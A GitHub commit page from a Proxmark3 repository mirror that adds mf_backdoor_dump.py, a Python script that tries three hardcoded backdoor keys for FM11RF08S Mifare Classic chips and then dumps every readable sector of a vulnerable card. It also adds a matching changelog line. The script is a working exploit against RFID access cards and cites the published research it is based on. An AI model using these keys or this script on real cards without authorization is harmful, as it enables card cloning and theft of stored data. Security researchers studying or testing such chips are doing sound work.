github/RRG-Proxmark3
1
0
Fork 0
mirror of https://github.com/RfidResearchGroup/proxmark3.git synced 2025-08-21 13:53:55 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merge pull request #2566 from Aptimex/mf_backdoor_dump

Browse source 
Add mf_backdoor_dump script
This commit is contained in:
Iceman 2024-10-10 13:16:47 +02:00 committed by GitHub
commit c5824bf78d
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
2 changed files with 64 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

1
CHANGELOG.md
View file

@ -34,6 +34,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac
- Fixed hardnested on AVX512F #2410 (@xianglin1998) - Fixed hardnested on AVX512F #2410 (@xianglin1998)
- Added `hf 14a aidsim` - simulates a PICC (like `14a sim`), and allows you to respond to specific AIDs and getData responses (@evildaemond) - Added `hf 14a aidsim` - simulates a PICC (like `14a sim`), and allows you to respond to specific AIDs and getData responses (@evildaemond)
- Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi) - Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi)
- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. (@Aptimex)
## [Backdoor.4.18994][2024-09-10] ## [Backdoor.4.18994][2024-09-10]
- Changed flashing messages to be less scary (@iceman1001) - Changed flashing messages to be less scary (@iceman1001)

63
client/pyscripts/mf_backdoor_dump.py Normal file
View file

@ -0,0 +1,63 @@
#!/usr/bin/env python3
# Uses the backdoor keys for the FM11RF08S (and similar) chipsets to quickly dump all the data they can read
# Tested on vulnerable 1k chips only
# Based on the work in this paper: https://eprint.iacr.org/2024/1275
import pm3
import os
import sys
TOTAL_SECTORS = 16 #1k chips
BACKDOOR_KEYS = ["A396EFA4E24F", "A31667A8CEC1", "518B3354E760"]
WORKING_KEY = None
required_version = (3, 8)
if sys.version_info < required_version:
print(f"Python version: {sys.version}")
print(f"The script needs at least Python v{required_version[0]}.{required_version[1]}. Abort.")
exit()
p = pm3.pm3()
# Test all the keys first to see which one works (if any)
for bk in BACKDOOR_KEYS:
p.console(f"hf mf rdbl -c 4 --key {bk} --blk 0")
output = p.grabbed_output.split('\n')
if "auth error" in output[0].lower():
continue
elif "can't select card" in output[0].lower():
print("Error reading the tag.")
exit()
else:
WORKING_KEY = bk
break
if not WORKING_KEY:
print("None of the backdoor keys seem to work with this tag.")
exit()
print(f"Backdoor key {WORKING_KEY} seems to work, dumping data...")
print("IMPORTANT: Only data blocks and access bytes can be dumped; keys will be shown as all 0's")
header = False
# Read every sector
for i in range(TOTAL_SECTORS):
p.console(f"hf mf rdsc -c 4 --key {WORKING_KEY} -s {i}")
start = False
for line in p.grabbed_output.split('\n'):
if not header:
print(line)
elif start and len(line) > 0:
print(line)
continue
if "----------" in line:
start = True
header = True
continue
else:
continue